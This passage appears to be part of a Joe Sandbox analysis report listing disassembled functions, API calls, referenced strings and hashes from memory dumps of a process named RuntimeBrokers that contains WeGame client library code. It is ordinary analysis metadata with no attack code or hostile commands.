                                        • d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp, xrefs: 6C14EFA9
                                        • error, xrefs: 6C14EFBD
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?get_log_instance@base@@H_prolog3H_prolog3_H_prolog3_catch_Logger@1@SystemTimes
                                        • String ID: d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp$error
                                        • API String ID: 1984077098-3542477499
                                        • Opcode ID: 12fb12756ed64fec721c6ebed18db78257392b4f24a60aecf589eb3a00baa4c9
                                        • Instruction ID: ce5b4f124110aabfc9f516b967a53cf42d6ddfeb598f34c33dcd3ca8fd3c9a92
                                        • Opcode Fuzzy Hash: 12fb12756ed64fec721c6ebed18db78257392b4f24a60aecf589eb3a00baa4c9
                                        • Instruction Fuzzy Hash: 63F0C231B40201ABDB14E6E18C55FDD72558F60719F208594B4267FFC0DBABEE0E8A81
                                        Function 6C12BCDD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C12BCE4
                                        • ?get_proxy_for_url_v2@net@ierd_tgp@@YA_NPB_WPAUproxy_info_t@12@@Z.COMMON(?,00000004), ref: 6C12BD0E
                                        • ?LoadStr@overseas@ierd_tgp@@YAPB_WV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.COMMON(TGP_COM_URL), ref: 6C12BD4E
                                        • __Init_thread_footer.LIBCMT ref: 6C12BD5D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?get_proxy_for_url_v2@net@ierd_tgp@@H_prolog3Init_thread_footerLoadStr@overseas@ierd_tgp@@U?$char_traits@_Uproxy_info_t@12@@V?$allocator@_V?$basic_string@_W@2@@std@@@W@std@@
                                        • String ID: TGP_COM_URL
                                        • API String ID: 2997012582-77736424
                                        • Opcode ID: d185c1f4ee27c7b40e2795cbc7061a9730b98523748051534c84b028a8425515
                                        • Instruction ID: 059ae4f699727003a496a1bd91345b0f2d0b08410e061826655edc81e6707868
                                        • Opcode Fuzzy Hash: d185c1f4ee27c7b40e2795cbc7061a9730b98523748051534c84b028a8425515
                                        • Instruction Fuzzy Hash: BC018F36A04644DBDF10FF79C944BCC37B0AB6232CF614689E42557BC1DB3E1B858AA2
                                        Function 6C152A0C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C152A13
                                          • Part of subcall function 6C0AA8F0: memmove.VCRUNTIME140(?,?,6C0B5839,?,?,00000000,?,?,6C0B5839,?,?), ref: 6C0AA917
                                        • ?get_client_version_type@overseas@ierd_tgp@@YAHXZ.COMMON(?,?,?,6C3CE62F,00000000,00000004), ref: 6C152A46
                                          • Part of subcall function 6C12E999: ?get_client_id@util_client_info@ierd_tgp@@YAHXZ.COMMON(?,6C1528B3), ref: 6C12E99D
                                        • ?get_client_version_type@overseas@ierd_tgp@@YAHXZ.COMMON(?,?,?,6C3CE62F,00000000,00000004), ref: 6C152A59
                                        Strings
                                        • Software\Microsoft\Windows\CurrentVersion\App Paths\WeGame.exe, xrefs: 6C152A65
                                        • Software\Microsoft\Windows\CurrentVersion\App Paths\WeGameX.exe, xrefs: 6C152A52
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?get_client_version_type@overseas@ierd_tgp@@$?get_client_id@util_client_info@ierd_tgp@@H_prolog3memmove
                                        • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths\WeGame.exe$Software\Microsoft\Windows\CurrentVersion\App Paths\WeGameX.exe
                                        • API String ID: 4280335684-1355461324
                                        • Opcode ID: b36c71d3ee3df8fd27f98974abe86227db7fafb8c3816c43bb319c94db89a0be
                                        • Instruction ID: 5727ac09cb7c3e64371e4aa544bbf70b8a94cf05a4d9445e85ae4cfe554cdbed
                                        • Opcode Fuzzy Hash: b36c71d3ee3df8fd27f98974abe86227db7fafb8c3816c43bb319c94db89a0be
                                        • Instruction Fuzzy Hash: C1F0B4B4F003059ECF249FE5844479EBAF0BF10304F90195DD114ABF81C7B89E8A8AC2
                                        Function 6C15275D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C152764
                                          • Part of subcall function 6C0AA8F0: memmove.VCRUNTIME140(?,?,6C0B5839,?,?,00000000,?,?,6C0B5839,?,?), ref: 6C0AA917
                                        • ?get_client_version_type@overseas@ierd_tgp@@YAHXZ.COMMON(?,?,?,6C3CE62F,00000000,00000004), ref: 6C152797
                                          • Part of subcall function 6C12E999: ?get_client_id@util_client_info@ierd_tgp@@YAHXZ.COMMON(?,6C1528B3), ref: 6C12E99D
                                        • ?get_client_version_type@overseas@ierd_tgp@@YAHXZ.COMMON(?,?,?,6C3CE62F,00000000,00000004), ref: 6C1527AA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?get_client_version_type@overseas@ierd_tgp@@$?get_client_id@util_client_info@ierd_tgp@@H_prolog3memmove
                                        • String ID: %APPDATA%\Tencent\WeGame$%APPDATA%\WeGameX
                                        • API String ID: 4280335684-623866923
                                        • Opcode ID: 53030e711e9d51687ab5f3b8f78d740f4bc2dbd9d06bb54b4aa3956e1f885f60
                                        • Instruction ID: cf6d8850d04c10262128c89d8ed711ed44c8c1365baf02ff7c1b0f8771106c98
                                        • Opcode Fuzzy Hash: 53030e711e9d51687ab5f3b8f78d740f4bc2dbd9d06bb54b4aa3956e1f885f60
                                        • Instruction Fuzzy Hash: 1FF0B4B0B007159EDB249FA5888478DBAB0BB24704F90591DE504A7F81C7BC5E8A8AD2
                                        Function 0044E6DC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31synchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WaitForSingleObject.KERNEL32(00000000,00002710), ref: 0044E6FF
                                        • GetCurrentProcess.KERNEL32(000000FF), ref: 0044E71B
                                        • TerminateProcess.KERNEL32(00000000), ref: 0044E722
                                        Strings
                                        • [monitor]main thread exit normally, xrefs: 0044E72A
                                        • [monitor]main thread may blocked, force exit, xrefs: 0044E70E
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: Process$CurrentObjectSingleTerminateWait
                                        • String ID: [monitor]main thread exit normally$[monitor]main thread may blocked, force exit
                                        • API String ID: 1760659532-2332168396
                                        • Opcode ID: ae6562ba9c677b6ba852a6ac3f07de9fa5b1fb529d478e5720e546180613d1b9
                                        • Instruction ID: 1cf81ec363b6ebe569419ca356c5ea4fb115ced3ecf586f553cadcf17724cf8a
                                        • Opcode Fuzzy Hash: ae6562ba9c677b6ba852a6ac3f07de9fa5b1fb529d478e5720e546180613d1b9
                                        • Instruction Fuzzy Hash: 2FF03071900204FFE714AFA9D98EE5D7BB4BF15722F104155F001962E0EBB85A85DA25
                                        Function 6C12E9F2 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C12E9F9
                                        • ?get_current_language@overseas@ierd_tgp@@YAHXZ.COMMON(?,?,?,?,?,00000004), ref: 6C12EA1F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?get_current_language@overseas@ierd_tgp@@H_prolog3
                                        • String ID: en_US$zh_CN$zh_HK
                                        • API String ID: 267711143-777672496
                                        • Opcode ID: 0a3403a7bcf6f453a7d11d81a4753c81ae34a45d97de53bc0d73c58903698cf8
                                        • Instruction ID: 2d8e48d2c5651e3744d0b82435ce0bac546bc68a5d2501e4f48dbf5229b2f4f1
                                        • Opcode Fuzzy Hash: 0a3403a7bcf6f453a7d11d81a4753c81ae34a45d97de53bc0d73c58903698cf8
                                        • Instruction Fuzzy Hash: B1F08C74A04305DECB50CFB8890078D7AF0BF22308F15495AE448E7F40E3BC8B858B92
                                        Function 6C152B46 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ?Is64Bit_OS@Sys_wrapper@common@ierd_tgp@@SA_NXZ.COMMON ref: 6C152B4A
                                          • Part of subcall function 6C152B89: GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 6C152BA7
                                          • Part of subcall function 6C152B89: GetProcAddress.KERNEL32(00000000), ref: 6C152BAE
                                        • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 6C152B5D
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C152B64
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProc$Bit_Is64Sys_wrapper@common@ierd_tgp@@
                                        • String ID: IsWow64Process$kernel32
                                        • API String ID: 357012051-3789238822
                                        • Opcode ID: e75658000dd32ba2ec4f9923ea82d25a95edf8df0ddfc25dcf512c0a93c18e87
                                        • Instruction ID: 44846b0b41768c3192914861332015f3440f9c7d3f558ffbc1e5ba70ed87f7f3
                                        • Opcode Fuzzy Hash: e75658000dd32ba2ec4f9923ea82d25a95edf8df0ddfc25dcf512c0a93c18e87
                                        • Instruction Fuzzy Hash: 67E01AB1A10206AEDF00DFA1C91CB9A77AC9B156ADF504944E429A6480DBB5CB14EB60
                                        Function 6C153806 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 6C153819
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C153820
                                        • GetCurrentProcess.KERNEL32(00000000), ref: 6C153830
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: AddressCurrentHandleModuleProcProcess
                                        • String ID: IsWow64Process$kernel32
                                        • API String ID: 4190356694-3789238822
                                        • Opcode ID: 415e592f6dd12913ca3f06065571e464c152af90a41a81cc30bce0b762d7e45a
                                        • Instruction ID: 74623f97763f50c79e8e09e628a6623aea5fea1810200d20575633090f150244
                                        • Opcode Fuzzy Hash: 415e592f6dd12913ca3f06065571e464c152af90a41a81cc30bce0b762d7e45a
                                        • Instruction Fuzzy Hash: B1E08C72C11659FBDF209BF0CD0DB8E7ABC9F05669F504954F400EB100C7B8CA008BA4
                                        Function 6C0BFFEE Relevance: 7.8, APIs: 6, Instructions: 282stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlenA.KERNEL32(?,?,?), ref: 6C0C0011
                                        • memset.VCRUNTIME140(?,00000000,?,?,00000000,00000004,?,?,?,?,?), ref: 6C0C00D2
                                        • memset.VCRUNTIME140(?,00000000,00000099,?,?), ref: 6C0C0226
                                        • memmove.VCRUNTIME140(?,00007A7C,?,?,00000000,00000099,?,?), ref: 6C0C023E
                                        • memset.VCRUNTIME140(?,00000000,00000099,?,?), ref: 6C0C02C0
                                        • memmove.VCRUNTIME140(?,-00007A7C,?,?,00000000,00000099,?,?), ref: 6C0C02CA
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: memset$memmove$lstrlen
                                        • String ID:
                                        • API String ID: 2250256610-0
                                        • Opcode ID: e9d7b3b71030a904382a68e4fda0a887133c1e1e799f883fa60bc21d71a1d74b
                                        • Instruction ID: 6da581bccb461b2dcb77a2a254710b42d12f45481067417f0b2c58ef9754dca6
                                        • Opcode Fuzzy Hash: e9d7b3b71030a904382a68e4fda0a887133c1e1e799f883fa60bc21d71a1d74b
                                        • Instruction Fuzzy Hash: 4DB18EB1B0464A9FCB08CF68C881A9EBBF5EF89308F14842DE85697701D734EA55CF91
                                        Function 6C0CEF4C Relevance: 7.6, APIs: 6, Instructions: 133COMMON
                                        Download Yara Rule
                                        APIs
                                        • memmove.VCRUNTIME140(?,00000007,00000010,00000000,?,?,?,?,?,6C1655A1,?,?,?,?,00000007,?), ref: 6C0CEF8B
                                        • memmove.VCRUNTIME140(?,00000007,00000010,00000000,?,?,?,?,?,6C1655A1,?,?,?,?,00000007,?), ref: 6C0CEFBC
                                        • memmove.VCRUNTIME140(?,?,00000000,?,00000007,00000010,00000000,?,?,?,?,?,6C1655A1,?,?,?), ref: 6C0CEFCE
                                        • memmove.VCRUNTIME140(?,?,00000000,00000000,?,?,?,?,?,6C1655A1,?,?,?,?,00000007,?), ref: 6C0CF03F
                                        • memmove.VCRUNTIME140(?,00000007,00000010,?,?,00000000,00000000,?,?,?,?,?,6C1655A1,?,?,?), ref: 6C0CF04B
                                        • memmove.VCRUNTIME140(?,00000007,00000010,?,00000007,00000010,?,?,00000000,00000000,?,?,?,?,?,6C1655A1), ref: 6C0CF062
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: memmove
                                        • String ID:
                                        • API String ID: 2162964266-0
                                        • Opcode ID: 464f9188ee2b88e5c0e6e9669e38f87082189316a72894ca1f4882de8c2e2018
                                        • Instruction ID: 25baa66d16ae5c7d2fc1b8d2c88daf1e0327d17b26594e526112aa12fb8c47fc
                                        • Opcode Fuzzy Hash: 464f9188ee2b88e5c0e6e9669e38f87082189316a72894ca1f4882de8c2e2018
                                        • Instruction Fuzzy Hash: 3B414D72701219AFCB05CFA8CC81A9E7BE9FF48788B148529F814C7700E771EA518BD6
                                        Function 6C0BEDCF Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 6C0B6B70: ?_Execute_once@std@@YAHAAUonce_flag@1@P6GHPAX1PAPAX@Z1@Z.MSVCP140(6C438534,6C0B6BB1,6C438538,?,6C0BA235,00000000,?,00000010), ref: 6C0B6B81
                                          • Part of subcall function 6C0B6B70: terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0B6B8D
                                        • ?m_get_symlink_status@directory_entry@filesystem@ierd_tgp@@ABE?AVfile_status@23@PAVerror_code@std@@@Z.COMMON(?,00000000,B33B76E5,?,00000000), ref: 6C0BEE33
                                        • ?m_get_status@directory_entry@filesystem@ierd_tgp@@ABE?AVfile_status@23@PAVerror_code@std@@@Z.COMMON(?,00000000,B33B76E5,?,00000000), ref: 6C0BEE5D
                                        • ?path@directory_entry@filesystem@ierd_tgp@@QBE?BV023@XZ.COMMON(?,?,00000000,B33B76E5), ref: 6C0BEE7E
                                        • ??0directory_iterator@filesystem@ierd_tgp@@QAE@ABVpath@12@AAVerror_code@std@@@Z.COMMON(00000000,00000000,?,?,00000000,B33B76E5), ref: 6C0BEE8B
                                        • ?equal@directory_iterator@filesystem@ierd_tgp@@QBE_NABV123@@Z.COMMON(?,?,?,00000000,B33B76E5), ref: 6C0BEEBA
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: Verror_code@std@@@$Vfile_status@23@$??0directory_iterator@filesystem@ierd_tgp@@?equal@directory_iterator@filesystem@ierd_tgp@@?m_get_status@directory_entry@filesystem@ierd_tgp@@?m_get_symlink_status@directory_entry@filesystem@ierd_tgp@@?path@directory_entry@filesystem@ierd_tgp@@Execute_once@std@@Uonce_flag@1@V023@V123@@Vpath@12@terminate
                                        • String ID:
                                        • API String ID: 787547266-0
                                        • Opcode ID: 7bcdea4a13c8afe4fd68479cfc9b3cac60c6d71609ce43c2e2fcdbbdc4a8ad23
                                        • Instruction ID: 5ebc0eed58e485c165ed6a7482b41ac3efc728b7d0f3de26e4e11860040cb7a1
                                        • Opcode Fuzzy Hash: 7bcdea4a13c8afe4fd68479cfc9b3cac60c6d71609ce43c2e2fcdbbdc4a8ad23
                                        • Instruction Fuzzy Hash: D2419D71A0520A9BCB14CFA9C544BDEF7F4EF45318F10466DE436B3A80DB31A909CB50
                                        Function 6C0DA759 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C0DA783
                                        • ?_Pninc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IAEPA_WXZ.MSVCP140 ref: 6C0DA7A8
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?pptr@?$basic_streambuf@D@std@@@std@@Pninc@?$basic_streambuf@_U?$char_traits@U?$char_traits@_W@std@@@std@@
                                        • String ID:
                                        • API String ID: 3900108780-0
                                        • Opcode ID: d4c18bfb4fbbc9902860ac1eb2ee983fa15da8f6b1849888a50e04b3c3fdb938
                                        • Instruction ID: 953b9b82f553f939a363eeb1db9dec0036c47e5859db28737acaf04b3e569818
                                        • Opcode Fuzzy Hash: d4c18bfb4fbbc9902860ac1eb2ee983fa15da8f6b1849888a50e04b3c3fdb938
                                        • Instruction Fuzzy Hash: 5C417075A00606EFC704DF6CC490699BBF1FF49314B658169E80597B90D730F951CF94
                                        Function 6C17E367 Relevance: 7.6, APIs: 5, Instructions: 100COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C17E36E
                                        • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,?,?,?,?,00000058), ref: 6C17E3CE
                                          • Part of subcall function 6C14B7B8: __EH_prolog3_GS.LIBCMT ref: 6C14B7BF
                                        • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,?,?,?,?,?,?,00000058), ref: 6C17E3D8
